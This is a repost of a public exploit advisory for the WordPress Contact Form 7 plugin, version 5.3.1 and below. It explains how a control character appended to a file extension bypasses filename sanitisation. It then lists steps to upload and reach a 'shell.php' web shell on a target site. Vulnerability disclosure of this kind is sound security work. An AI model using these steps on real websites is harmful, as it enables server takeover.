WordPress Contact Form 7 5.3.1 Shell Upload ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on December 22nd, 2020 📆 | 2894 Views ⚑


WordPress Contact Form 7 5.3.1 Shell Upload ≈ Packet Storm

# Exploit Title: WordPress Plugin Contact Form 7 5.3.1 – Unrestricted File Upload
# Date: 12/20/2020
# Exploit Author: Ramón Vila Ferreres (@ramonvfer)
# Vendor Homepage: https://contactform7.com
# Software Link: https://wordpress.org/plugins/contact-form-7/
# Version: 5.3.1 and below
# Tested on: Windows 10 1909, Ubuntu 20.4

ContactForm7 version 5.3.1 and below doesn’t properly sanitize
uploaded filenames to prevent Arbitrary File Upload that can lead
to full server takeover in the worst-case scenario.

This happens in the wpcf7_antiscript_file_name function, that fails
to sanitize the provided filename if it ends with any Unicode special
character ranging from U+0000 (null) to U+001F (us).

The function matches both the file name and the file extension against
an exclusion regex. Appending any unicode special character to the
file extension results in a complete bypass of this verification (as
the regex doesn’t match) leading to the Unrestricted File Upload.

1. Change the file extension of the file you want to upload (e.g:
“shell.php”) to its equivalent with the special character ending (in
this case “shell.php” (appended U+0000))

2. Upload the file using ContactForm7 file upload feature in the
target website.

3. Go to /wp-content/uploads/wpcf7_uploads/shell.php
Note the special character at the end
Note that the file upload location may vary as it is configurable.

4. Now you have uploaded your file!

Source link

Tagged with:

Leave a Reply